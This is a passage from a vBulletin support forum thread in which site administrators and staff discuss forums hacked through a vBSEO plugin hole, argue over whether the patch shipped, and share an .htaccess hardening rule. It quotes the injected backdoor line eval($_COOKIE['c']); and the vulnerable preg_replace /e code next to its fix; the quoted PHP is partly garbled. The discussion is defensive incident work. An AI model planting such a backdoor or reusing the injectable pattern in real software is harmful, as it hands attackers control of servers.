Possible Exploit

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Jafo
    Senior Member
    • Apr 2004
    • 278

    #16
    Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!

    Comment

    • Ace
      Senior Member
      • Apr 2004
      • 4051
      • 4.2.X

      #17
      Just in case - you do have the following .htaccess protection in all writable directories?

      Code:
      <Files ~ "\.(php\d*|cgi|pl|phtml)$">
      order allow,deny
      deny from all
      </Files>
      My Live vB5 Site - NZEating.com
      vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

      Comment

      • Jafo
        Senior Member
        • Apr 2004
        • 278

        #18
        Originally posted by Ace
        Just in case - you do have the following .htaccess protection in all writable directories?

        Code:
        <Files ~ "\.(php\d*|cgi|pl|phtml)$">
        order allow,deny
        deny from all
        </Files>
        Yes we do and we even have admincp and vbseocp.php protected by apache auth..

        Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.

        Comment

        • kau
          Senior Member
          • Jul 2002
          • 772

          #19
          It is vBSEO.

          All our non-vBSEO sites did not get hacked.

          All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.

          All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.

          We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.

          There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.
          Group Builder

          Comment

          • briansol
            Senior Member
            • Apr 2006
            • 674
            • 3.6.x

            #20
            FYI, the bug has been confirmed and a patch release is enroute.

            Comment

            • Wayne Luke
              vBulletin Technical Support Lead
              • Aug 2000
              • 73981

              #21
              Originally posted by DigitalCrowd
              I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

              eval($_COOKIE['c']);

              Here is a site that references a PHP compromise with similar code...

              http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns

              This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.
              Translations provided by Google.

              Wayne Luke
              The Rabid Badger - a vBulletin Cloud demonstration site.
              vBulletin 5 API

              Comment

              • DigitalCrowd
                Senior Member
                • Aug 2000
                • 111
                • 3.6.x

                #22
                Yep, I removed it as soon as I saw it.

                Comment

                • briansol
                  Senior Member
                  • Apr 2006
                  • 674
                  • 3.6.x

                  #23

                  Comment

                  • Talaturen
                    New Member
                    • Dec 2005
                    • 12
                    • 3.8.x

                    #24
                    It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!

                    Comment

                    • Loco.M
                      Senior Member
                      • Mar 2005
                      • 4319
                      • 3.5.x

                      #25
                      Originally posted by Jafo
                      Here it is folks, in functions_vbseocp_abstract.php

                      PHP Code:
                      public static function proc_deutf($ptxt$tocharset)
                      {
                      $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
                      return 
                      $ptxt;

                      I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

                      PHP Code:
                      public static function proc_deutf($ptxt$tocharset)
                      {
                      $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
                      return 
                      $ptxt;

                      Ouch.. that's a lot of sites at risk for a year..
                      -- Web Developer for hire
                      ---Online Marketing Tools and Articles

                      Comment

                      • Jafo
                        Senior Member
                        • Apr 2004
                        • 278

                        #26
                        Originally posted by Talaturen
                        It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
                        You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.

                        Comment

                        • Wayne Luke
                          vBulletin Technical Support Lead
                          • Aug 2000
                          • 73981

                          #27
                          Originally posted by Talaturen
                          It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
                          It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before the patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information than you should share it.
                          Translations provided by Google.

                          Wayne Luke
                          The Rabid Badger - a vBulletin Cloud demonstration site.
                          vBulletin 5 API

                          Comment

                          • Jafo
                            Senior Member
                            • Apr 2004
                            • 278

                            #28
                            The problem is, the patch was somehow not included in the latest release, so it was NOT patched until later today.

                            Comment

                            • Talaturen
                              New Member
                              • Dec 2005
                              • 12
                              • 3.8.x

                              #29
                              Originally posted by Jafo
                              You are wrong, the patch was NOT in 3.6.0 until we discovered this TODAY. I know, I checked.
                              Nope, you are wrong. I've checked backups on the _abstract file from around 5 days ago (and the file hasn't been changed since I updated to 3.6.0). The same patch they are telling us to apply is already applied on that file, and other users on vBSEO forum have confirmed this too.

                              Originally posted by Wayne Luke
                              It is a pretty old unknown exploit then to be in both 3.8.X and 4.X. There was an issue with group searching in both versions and this was patched before 4.1.4 was released so it could be related to that if people didn't apply both patches or they were exploited before the patched. I haven't seen anything pointing to a new exploit yet though. We've had several potential issues submitted to us but they could not be replicated. If you have additional information than you should share it.
                              I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in november, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that unless it was a vulnerability that was been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.

                              Comment

                              • Wayne Luke
                                vBulletin Technical Support Lead
                                • Aug 2000
                                • 73981

                                #30
                                Originally posted by Talaturen
                                I have no idea if it is in 3.8.X, it happened to me around 4.1.8 (I can't know for sure because all I can see is the plugin id, and it's after I installed a plugin sometime in november, and before I updated to vBulletin 4.1.10). I've always been quick with applying security patches too. I don't think this is an exploit in vBulletin itself, because so far affected users are only people who use vBSEO (from what I have seen, I may be wrong). I don't know much more than that unless it was a vulnerability that was been fixed between 4.1.8 and 4.1.10 of vBulletin, it is very likely to still be active.
                                You're posting in the 3.8X forum.
                                Translations provided by Google.

                                Wayne Luke
                                The Rabid Badger - a vBulletin Cloud demonstration site.
                                vBulletin 5 API

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...